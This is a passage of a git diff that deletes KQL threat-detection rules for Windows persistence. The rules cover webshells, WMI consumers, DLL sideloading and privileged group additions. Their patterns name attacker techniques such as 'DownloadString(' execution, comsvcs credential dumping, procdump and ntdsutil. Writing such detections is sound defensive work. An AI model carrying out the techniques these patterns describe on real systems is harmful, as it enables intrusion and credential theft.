-| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".vbs" or FolderPath endswith ".vbe" or FolderPath endswith ".bat" or FolderPath endswith ".ps1" or FolderPath endswith ".hta" or FolderPath endswith ".dll" or FolderPath endswith ".jar" or FolderPath endswith ".msi" or FolderPath endswith ".scr" or FolderPath endswith ".cmd")
\ No newline at end of file
diff --git a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql b/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// Tags: attack.execution, attack.persistence
-DeviceProcessEvents
-| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_desktop.ini_Action.kql b/Persistence/Suspicious_desktop.ini_Action.kql
deleted file mode 100644
index 7c92db8d..00000000
--- a/Persistence/Suspicious_desktop.ini_Action.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
-// Date: 2020/03/19
-// Level: medium
-// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsService_Execution.kql b/Persistence/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Persistence/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsSuspend_Execution.kql b/Persistence/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Persistence/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Persistence/System_Scripts_Autorun_Keys_Modification.kql b/Persistence/System_Scripts_Autorun_Keys_Modification.kql
deleted file mode 100644
index a6f88a0b..00000000
--- a/Persistence/System_Scripts_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Tasks_Folder_Evasion.kql b/Persistence/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Persistence/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Persistence/Third_Party_Software_DLL_Sideloading.kql b/Persistence/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Persistence/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Persistence/UAC_Bypass_With_Fake_DLL.kql b/Persistence/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Persistence/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Persistence/Uncommon_Userinit_Child_Process.kql b/Persistence/Uncommon_Userinit_Child_Process.kql
deleted file mode 100644
index 6b52304c..00000000
--- a/Persistence/Uncommon_Userinit_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
-// Date: 2019/01/12
-// Level: high
-// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
-// Tags: attack.t1037.001, attack.persistence
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Persistence/User_Added_To_Highly_Privileged_Group.kql b/Persistence/User_Added_To_Highly_Privileged_Group.kql
deleted file mode 100644
index 5ffd354c..00000000
--- a/Persistence/User_Added_To_Highly_Privileged_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Local_Administrators_Group.kql b/Persistence/User_Added_to_Local_Administrators_Group.kql
deleted file mode 100644
index 7cd2e84d..00000000
--- a/Persistence/User_Added_to_Local_Administrators_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql b/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/VBScript_Payload_Stored_in_Registry.kql b/Persistence/VBScript_Payload_Stored_in_Registry.kql
deleted file mode 100644
index 9973f4c1..00000000
--- a/Persistence/VBScript_Payload_Stored_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData"))))
\ No newline at end of file
diff --git a/Persistence/VMToolsd_Suspicious_Child_Process.kql b/Persistence/VMToolsd_Suspicious_Child_Process.kql
deleted file mode 100644
index fcf64329..00000000
--- a/Persistence/VMToolsd_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops, Bhabesh Raj
-// Date: 2021/10/08
-// Level: high
-// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/Persistence/VsCode_Powershell_Profile_Modification.kql b/Persistence/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Persistence/VsCode_Powershell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Persistence/WINEKEY_Registry_Modification.kql b/Persistence/WINEKEY_Registry_Modification.kql
deleted file mode 100644
index 40b59710..00000000
--- a/Persistence/WINEKEY_Registry_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/30
-// Level: high
-// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
-// Tags: attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql b/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
deleted file mode 100644
index 653e625e..00000000
--- a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/11
-// Level: critical
-// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
deleted file mode 100644
index 90563eab..00000000
--- a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects WMI command line event consumers
-// Tags: attack.t1546.003, attack.persistence
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
deleted file mode 100644
index a3d5d209..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects file writes of WMI script event consumer
-// Tags: attack.t1546.003, attack.persistence
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql b/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
deleted file mode 100644
index 9eba69fe..00000000
--- a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
-// Date: 2017/01/01
-// Level: high
-// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", 
"sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/Persistence/Webshell_Hacking_Activity_Patterns.kql b/Persistence/Webshell_Hacking_Activity_Patterns.kql
deleted file mode 100644
index e8ef37ec..00000000
--- a/Persistence/Webshell_Hacking_Activity_Patterns.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: high
-// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
-
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or 
